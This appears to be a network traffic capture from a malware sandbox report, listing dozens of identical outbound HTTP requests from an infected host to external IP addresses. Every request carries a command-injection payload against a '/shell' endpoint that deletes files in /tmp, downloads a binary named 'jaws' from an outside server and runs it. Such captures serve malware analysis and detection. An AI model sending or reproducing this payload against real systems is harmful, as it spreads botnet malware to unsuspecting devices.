                    7192.168.2.233762442.244.32.21980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237756968 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    8192.168.2.2350616198.208.129.22880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237801075 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    9192.168.2.235186698.108.66.20080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237843037 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    10192.168.2.2353862149.115.99.19180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237869024 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    11192.168.2.233748092.126.90.3480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237898111 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    12192.168.2.234474281.132.76.12280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237931013 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    13192.168.2.2360788193.77.243.23880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.237997055 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    14192.168.2.236074235.40.58.24180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238015890 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    15192.168.2.2349670115.246.114.14880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238040924 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    16192.168.2.234383234.240.253.4180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238079071 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    17192.168.2.235821278.247.12.10980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238107920 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    18192.168.2.2356838117.200.77.20480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238152981 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    19192.168.2.2339456107.165.24.22880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238204956 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    20192.168.2.234494681.37.220.4080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238244057 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    21192.168.2.235559843.221.116.13980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238281965 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    22192.168.2.235981637.168.229.13480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238312006 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    23192.168.2.2351142149.127.43.23580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238346100 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    24192.168.2.234217841.79.241.7280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238377094 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    25192.168.2.2339486202.24.92.23480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238429070 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    26192.168.2.2344104145.100.188.8380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238456964 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    27192.168.2.2334700202.238.8.25480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238498926 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    28192.168.2.2356756174.194.105.23580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238571882 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    29192.168.2.2355292140.5.76.15380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238605976 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    30192.168.2.233584283.231.82.880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238658905 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    31192.168.2.234726457.222.230.20680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238699913 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    32192.168.2.2352794128.101.239.15380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238729954 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    33192.168.2.235857445.5.242.21780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238770008 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    34192.168.2.2334108204.167.44.18180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238817930 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    35192.168.2.2334456194.252.4.20080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238850117 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    36192.168.2.234255468.39.123.21980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238878965 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    37192.168.2.234956495.237.237.15680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238939047 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    38192.168.2.2358070186.28.217.11780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238956928 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    39192.168.2.2358076142.5.237.16980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.238996029 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    40192.168.2.2351510205.249.54.11180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239032030 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    41192.168.2.2344372117.241.145.8980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239114046 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    42192.168.2.233652072.194.176.6980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239147902 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    43192.168.2.234605851.243.182.17180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239284992 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    44192.168.2.235281241.59.82.22880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239312887 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    45192.168.2.2350980212.199.183.18580
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239332914 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    46192.168.2.233728841.62.241.24780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239377022 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    47192.168.2.2354284110.176.150.4380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239412069 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    48192.168.2.233436092.228.245.15980
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239526987 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    49192.168.2.235623495.239.226.12380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239557028 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    50192.168.2.2351050108.85.135.21880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239595890 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    51192.168.2.234099252.206.114.4880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239684105 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    52192.168.2.236010458.199.54.7080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239739895 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    53192.168.2.2350078129.193.114.9880
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239780903 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    54192.168.2.234477825.87.20.3080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239819050 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    55192.168.2.2354416146.97.242.8780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239856005 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    56192.168.2.2354180222.84.171.3480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239886999 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    57192.168.2.2336546196.44.130.15480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239928961 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    58192.168.2.233819448.234.108.15680
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239960909 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    59192.168.2.233291445.238.94.6180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.239990950 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    60192.168.2.235539412.95.201.10280
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240024090 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    61192.168.2.2351500187.75.110.9380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240061998 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    62192.168.2.2333834106.16.15.22080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240081072 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    63192.168.2.2347714204.135.242.11780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240112066 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    64192.168.2.233942031.70.83.3180
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240154028 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    65192.168.2.2337886154.1.74.10380
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240199089 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    66192.168.2.2334922158.4.130.10080
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240242004 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    67192.168.2.2333706187.205.139.8480
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240366936 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    68192.168.2.2349442124.60.75.13780
                    TimestampBytes transferredDirectionData
                    Jun 1, 2024 18:15:53.240394115 CEST244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 94.156.64.221/jaws;sh+/tmp/jaws HTTP/1.1
                    User-Agent: Hello, world
                    Host: 127.0.0.1:80
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                    Connection: keep-alive


                    Session IDSource IPSource PortDestination IPDestination Port
                    69192.168.2.2334260105.120.208.24280
                    TimestampBytes transferredDirectionData
